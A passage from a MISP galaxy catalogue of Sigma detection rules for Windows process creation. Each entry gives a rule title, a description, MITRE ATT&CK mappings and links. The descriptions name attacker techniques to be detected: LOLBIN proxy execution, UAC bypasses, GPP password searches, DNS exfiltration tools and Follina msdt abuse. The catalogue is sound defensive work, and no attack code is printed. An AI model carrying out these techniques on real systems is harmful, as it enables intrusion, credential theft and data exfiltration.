Detects the malicious use of a control panel item

The tag is: misp-galaxy:sigma-rules="Control Panel Items"

Control Panel Items has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Control Panel - T1218.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Event Triggered Execution - T1546" with estimative-language:likelihood-probability="almost-certain"

Table 10498. Table References

Links

https://ired.team/offensive-security/code-execution/code-execution-through-control-panel-add-ins

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_control_panel_item.yml

Arbitrary MSI Download Via Devinit.EXE

Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system

The tag is: misp-galaxy:sigma-rules="Arbitrary MSI Download Via Devinit.EXE"

Arbitrary MSI Download Via Devinit.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10499. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devinit/

https://twitter.com/mrd0x/status/1460815932402679809

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_devinit_lolbin_usage.yml

Suspicious AddinUtil.EXE CommandLine Execution

Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with suspicious Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversary's Addins.Store payload.

The tag is: misp-galaxy:sigma-rules="Suspicious AddinUtil.EXE CommandLine Execution"

Suspicious AddinUtil.EXE CommandLine Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10500. Table References

Links

https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml

Potential Persistence Via Microsoft Compatibility Appraiser

Detects manual execution of the "Microsoft Compatibility Appraiser" task via schtasks in order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" registry key.

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Microsoft Compatibility Appraiser"

Potential Persistence Via Microsoft Compatibility Appraiser has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 10501. Table References

Links

https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_persistence_windows_telemetry.yml

Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution

Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary

The tag is: misp-galaxy:sigma-rules="Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution"

Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10502. Table References

Links

https://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5

https://twitter.com/mrd0x/status/1463526834918854661

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml

Suspicious AgentExecutor PowerShell Execution

Detects execution of the AgentExecutor.exe binary, which can be abused as a LOLBIN to execute PowerShell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by the 6th positional argument.

The tag is: misp-galaxy:sigma-rules="Suspicious AgentExecutor PowerShell Execution"

Suspicious AgentExecutor PowerShell Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10503. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/

https://twitter.com/jseerden/status/1247985304667066373/photo/1

https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension

https://twitter.com/lefterispan/status/1286259016436514816

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_agentexecutor_susp_usage.yml

Suspicious HWP Sub Processes

Detects suspicious Hangul Word Processor (Hanword) subprocesses that could indicate exploitation.

The tag is: misp-galaxy:sigma-rules="Suspicious HWP Sub Processes"

Suspicious HWP Sub Processes has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 10504. Table References

Links

https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/

https://blog.alyac.co.kr/1901

https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1

https://twitter.com/cyberwar_15/status/1187287262054076416

https://en.wikipedia.org/wiki/Hangul_(word_processor)

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hwp_exploits.yml

UAC Bypass via Windows Firewall Snap-In Hijack

Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in

The tag is: misp-galaxy:sigma-rules="UAC Bypass via Windows Firewall Snap-In Hijack"

UAC Bypass via Windows Firewall Snap-In Hijack has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

Table 10505. Table References

Links

https://www.elastic.co/guide/en/security/current/uac-bypass-via-windows-firewall-snap-in-hijack.html#uac-bypass-via-windows-firewall-snap-in-hijack

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml

Suspicious Query of MachineGUID

Detects the use of reg to get MachineGuid information.

The tag is: misp-galaxy:sigma-rules="Suspicious Query of MachineGUID"

Suspicious Query of MachineGUID has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 10506. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-8---windows-machineguid-discovery

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_machineguid.yml

InfDefaultInstall.exe .inf Execution

Detects execution of an SCT script using scrobj.dll from a command entered into a specially prepared INF file.

The tag is: misp-galaxy:sigma-rules="InfDefaultInstall.exe .inf Execution"

InfDefaultInstall.exe .inf Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10507. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md#atomic-test-4---infdefaultinstallexe-inf-execution

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml

Windows Share Mount Via Net.EXE

Detects when a share is mounted using the "net.exe" utility

The tag is: misp-galaxy:sigma-rules="Windows Share Mount Via Net.EXE"

Windows Share Mount Via Net.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 10508. Table References

Links

https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_use_mount_share.yml

Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location

Detects potentially suspicious execution of the Regasm/Regsvcs utilities from a potentially suspicious location

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location"

Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvcs/Regasm - T1218.009" with estimative-language:likelihood-probability="almost-certain"

Table 10509. Table References

Links

https://www.fortiguard.com/threat-signal-report/4718?s=09

https://lolbas-project.github.io/lolbas/Binaries/Regasm/

https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml

DLL Loaded via CertOC.EXE

Detects when a user installs certificates by using CertOC.exe to load the target DLL file.

The tag is: misp-galaxy:sigma-rules="DLL Loaded via CertOC.EXE"

DLL Loaded via CertOC.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10510. Table References

Links

https://twitter.com/sblmsrsn/status/1445758411803480072?s=20

https://lolbas-project.github.io/lolbas/Binaries/Certoc/

https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml

New Virtual Smart Card Created Via TpmVscMgr.EXE

Detects execution of "Tpmvscmgr.exe" to create a new virtual smart card.

The tag is: misp-galaxy:sigma-rules="New Virtual Smart Card Created Via TpmVscMgr.EXE"

Table 10511. Table References

Links

https://learn.microsoft.com/en-us/windows/security/identity-protection/virtual-smart-cards/virtual-smart-card-tpmvscmgr

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tpmvscmgr_add_virtual_smartcard.yml

WinDbg/CDB LOLBIN Usage

Detects usage of "cdb.exe" to launch 64-bit shellcode or arbitrary processes or commands from a debugger script file

The tag is: misp-galaxy:sigma-rules="WinDbg/CDB LOLBIN Usage"

WinDbg/CDB LOLBIN Usage has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

Table 10512. Table References

Links

https://web.archive.org/web/20170715043507/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/

https://twitter.com/nas_bench/status/1534957360032120833

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cdb.yml

Regsvr32 DLL Execution With Uncommon Extension

Detects a "regsvr32" execution where the DLL doesn’t contain a common file extension.

The tag is: misp-galaxy:sigma-rules="Regsvr32 DLL Execution With Uncommon Extension"

Regsvr32 DLL Execution With Uncommon Extension has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1574" with estimative-language:likelihood-probability="almost-certain"

Table 10513. Table References

Links

https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_uncommon_extension.yml

HackTool - Htran/NATBypass Execution

Detects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass)

The tag is: misp-galaxy:sigma-rules="HackTool - Htran/NATBypass Execution"

HackTool - Htran/NATBypass Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

Table 10514. Table References

Links

https://github.com/HiwinCN/HTran

https://github.com/cw1997/NATBypass

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_htran_or_natbypass.yml

PUA - NirCmd Execution

Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity

The tag is: misp-galaxy:sigma-rules="PUA - NirCmd Execution"

PUA - NirCmd Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 10515. Table References

Links

https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/

https://www.nirsoft.net/utils/nircmd2.html#using

https://www.nirsoft.net/utils/nircmd.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nircmd.yml

Renamed SysInternals DebugView Execution

Detects suspicious renamed SysInternals DebugView execution

The tag is: misp-galaxy:sigma-rules="Renamed SysInternals DebugView Execution"

Renamed SysInternals DebugView Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 10516. Table References

Links

https://www.epicturla.com/blog/sysinturla

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_sysinternals_debugview.yml

Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension

Detects potentially suspicious execution of the Regasm/Regsvcs utilities with an uncommon extension.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension"

Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvcs/Regasm - T1218.009" with estimative-language:likelihood-probability="almost-certain"

Table 10517. Table References

Links

https://www.fortiguard.com/threat-signal-report/4718?s=09

https://lolbas-project.github.io/lolbas/Binaries/Regasm/

https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml

Uncommon Child Process Of Conhost.EXE

Detects uncommon "conhost" child processes. This could be a sign of "conhost" usage as a LOLBIN or potential process injection activity.

The tag is: misp-galaxy:sigma-rules="Uncommon Child Process Of Conhost.EXE"

Uncommon Child Process Of Conhost.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10518. Table References

Links

http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conhost_susp_child_process.yml

Suspicious Rundll32 Invoking Inline VBScript

Detects a suspicious process related to rundll32 based on a command line that invokes inline VBScript, as seen being used by UNC2452.

The tag is: misp-galaxy:sigma-rules="Suspicious Rundll32 Invoking Inline VBScript"

Suspicious Rundll32 Invoking Inline VBScript has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 10519. Table References

Links

https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_inline_vbs.yml

Compress Data and Lock With Password for Exfiltration With WINZIP

An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities

The tag is: misp-galaxy:sigma-rules="Compress Data and Lock With Password for Exfiltration With WINZIP"

Compress Data and Lock With Password for Exfiltration With WINZIP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

Table 10520. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winzip_password_compression.yml

Use of W32tm as Timer

When configured with suitable command line arguments, w32tm can act as a delay mechanism

The tag is: misp-galaxy:sigma-rules="Use of W32tm as Timer"

Use of W32tm as Timer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"

Table 10521. Table References

Links

https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains

https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_w32tm.yml

Potential Provisioning Registry Key Abuse For Binary Proxy Execution

Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".

The tag is: misp-galaxy:sigma-rules="Potential Provisioning Registry Key Abuse For Binary Proxy Execution"

Potential Provisioning Registry Key Abuse For Binary Proxy Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10522. Table References

Links

https://twitter.com/0gtweet/status/1674399582162153472

https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml

File Download From IP Based URL Via CertOC.EXE

Detects when a user downloads a file from an IP based URL using CertOC.exe

The tag is: misp-galaxy:sigma-rules="File Download From IP Based URL Via CertOC.EXE"

File Download From IP Based URL Via CertOC.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10523. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Certoc/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_download_direct_ip.yml

Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet

Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.

The tag is: misp-galaxy:sigma-rules="Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet"

Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"

Table 10524. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_zip_compress.yml

Greedy File Deletion Using Del

Detects execution of the "del" builtin command to remove files using a greedy/wildcard expression. This is often used by malware to delete the content of folders that may contain the initial malware infection or to delete evidence.

The tag is: misp-galaxy:sigma-rules="Greedy File Deletion Using Del"

Greedy File Deletion Using Del has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

Table 10525. Table References

Links

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase

https://www.joesandbox.com/analysis/509330/0/html#1044F3BDBE3BB6F734E357235F4D5898582D

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_del_greedy_deletion.yml

Suspicious Group And Account Reconnaissance Activity Using Net.EXE

Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE. Check whether the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM).

The tag is: misp-galaxy:sigma-rules="Suspicious Group And Account Reconnaissance Activity Using Net.EXE"

Suspicious Group And Account Reconnaissance Activity Using Net.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

Table 10527. Table References

Links

https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/

https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/

https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_groups_and_accounts_recon.yml

UAC Bypass Using IEInstal - Process

Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using IEInstal - Process"

UAC Bypass Using IEInstal - Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10528. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_ieinstal.yml

HackTool - Stracciatella Execution

Detects Stracciatella, which executes a PowerShell runspace from within C# (aka the SharpPick technique) with AMSI, ETW and Script Block Logging disabled, based on PE metadata characteristics.

The tag is: misp-galaxy:sigma-rules="HackTool - Stracciatella Execution"

HackTool - Stracciatella Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10529. Table References

Links

https://github.com/mgeeky/Stracciatella

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_stracciatella_execution.yml

Potential Network Sniffing Activity Using Network Tools

Detects potential network sniffing via use of network tools such as "tshark", "windump". Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.

The tag is: misp-galaxy:sigma-rules="Potential Network Sniffing Activity Using Network Tools"

Potential Network Sniffing Activity Using Network Tools has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"

Table 10530. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_sniffing.yml

DNS Exfiltration and Tunneling Tools Execution

Detects execution of well-known DNS exfiltration tools.

The tag is: misp-galaxy:sigma-rules="DNS Exfiltration and Tunneling Tools Execution"

DNS Exfiltration and Tunneling Tools Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Symmetric Encrypted Non-C2 Protocol - T1048.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

Table 10531. Table References

Links

https://github.com/yarrick/iodine

https://github.com/iagox86/dnscat2

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml

Share And Session Enumeration Using Net.EXE

Detects attempts to enumerate file shares, printer shares and sessions using "net.exe" with the "view" flag.

The tag is: misp-galaxy:sigma-rules="Share And Session Enumeration Using Net.EXE"

Share And Session Enumeration Using Net.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

Table 10532. Table References

Links

https://eqllib.readthedocs.io/en/latest/analytics/b8a94d2f-dc75-4630-9d73-1edc6bd26fff.html

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_view_share_and_sessions_enum.yml

Suspicious Child Process Of BgInfo.EXE

Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript

The tag is: misp-galaxy:sigma-rules="Suspicious Child Process Of BgInfo.EXE"

Suspicious Child Process Of BgInfo.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10533. Table References

Links

https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bginfo_suspicious_child_process.yml

Potential Regsvr32 Commandline Flag Anomaly

Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without the "/n" flag, which should be uncommon.

The tag is: misp-galaxy:sigma-rules="Potential Regsvr32 Commandline Flag Anomaly"

Potential Regsvr32 Commandline Flag Anomaly has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

Table 10534. Table References

Links

https://twitter.com/sbousseaden/status/1282441816986484737?s=12

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml

Findstr GPP Passwords

Detects searches for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.

The tag is: misp-galaxy:sigma-rules="Findstr GPP Passwords"

Findstr GPP Passwords has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Group Policy Preferences - T1552.006" with estimative-language:likelihood-probability="almost-certain"

Table 10535. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.006/T1552.006.md#atomic-test-1---gpp-passwords-findstr

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords.yml

Finger.exe Suspicious Invocation

Detects suspicious execution of the aged finger.exe tool, which is often used in malware attacks nowadays.

The tag is: misp-galaxy:sigma-rules="Finger.exe Suspicious Invocation"

Finger.exe Suspicious Invocation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10536. Table References

Links

http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt

https://twitter.com/bigmacjpg/status/1349727699863011328?s=12

https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_finger_usage.yml

Suspicious Rundll32 Activity Invoking Sys File

Detects a suspicious process related to rundll32 based on a command line that includes a *.sys file, as seen being used by UNC2452.

The tag is: misp-galaxy:sigma-rules="Suspicious Rundll32 Activity Invoking Sys File"

Suspicious Rundll32 Activity Invoking Sys File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 10537. Table References

Links

https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_sys.yml

HackTool - UACMe Akagi Execution

Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata

The tag is: misp-galaxy:sigma-rules="HackTool - UACMe Akagi Execution"

HackTool - UACMe Akagi Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10538. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_uacme.yml

Potential Arbitrary Command Execution Using Msdt.EXE

Detects processes leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability

The tag is: misp-galaxy:sigma-rules="Potential Arbitrary Command Execution Using Msdt.EXE"

Potential Arbitrary Command Execution Using Msdt.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10539. Table References

Links

https://twitter.com/_JohnHammond/status/1531672601067675648

https://twitter.com/nao_sec/status/1530196847679401984

https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml

Cloudflared Quick Tunnel Execution

Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB. The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com. The tool has been observed in use by threat groups including Akira ransomware.

The tag is: misp-galaxy:sigma-rules="Cloudflared Quick Tunnel Execution"

Cloudflared Quick Tunnel Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"

Table 10540. Table References

Links

https://github.com/cloudflare/cloudflared

https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/

